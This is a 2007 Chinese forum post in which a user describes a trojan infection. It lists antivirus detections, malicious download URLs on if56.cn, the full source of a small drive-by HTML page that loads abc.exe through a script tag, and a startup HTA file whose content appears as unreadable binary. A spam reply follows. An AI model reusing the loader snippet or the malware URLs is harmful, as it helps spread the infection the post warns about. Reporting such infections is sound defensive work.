返回列表 发帖

Rank: 9Rank: 9Rank: 9

QQ
1# 跳转到 » 倒序看帖
打印
tT
shillan发表于 2007-6-16 13:51 | 只看该作者
现象:
1、开机时,瑞星实时监控提示:
trojan.dl.delf.yrg    删除成功   c:\documents and settings\administrator\local settings\temporary internet files\content.ie5\n2hbwtbz     abc[1].exe



trojan.dl.mnless.anq    删除成功     c:\documents and settings\administrator\local settings\temporary internet files\content.ie5\zmfsuh8w    abc[1].exe>>upx_a


若安装的卡巴斯基,则提示如下图:

此主题相关图片


此主题相关图片


删除后,再次开机时,还会出现。

2、c:\documents and settings\administrator\local settings\temporary internet files\中发现如下两文件:
downmm.html(http://www.if56.cn/lo/downmm.html)和abc.exe(http://www.if56.cn/lo/abc.exe)

如下图:
此主题相关图片


downmm.html的内容如下:
  1. <html>
  2. <title>
  3. downmm
  4. </title>
  5. <script src="abc.exe"></script>
  6. <body>
  7. start download.............................
  8. </body>
  9. </html>
复制代码


3、“开始→所有程序→启动”中出现:“windows.hta”,“windows.hta”中内容如下:
[code]tg!     稈?蚕?  _?        g 噎c?胂般  ?             ?幎雖?嶖  _?           
                    |  ?等骪??  dw=   
收藏 分享
欢迎光临:逐梦论坛

Rank: 1
2#
wwindwind发表于 2009-9-9 23:01 | 只看该作者
嘻嘻~`` 看了楼主的资料,〖黄金算命大师〗预测楼主今年有桃花运~```

TOP

返回列表

Powered by Discuz! 7.2   论坛QQ群:逐梦论坛群

© 2001-2021 Comsenz Inc. 鲁公网安备 37120302000001号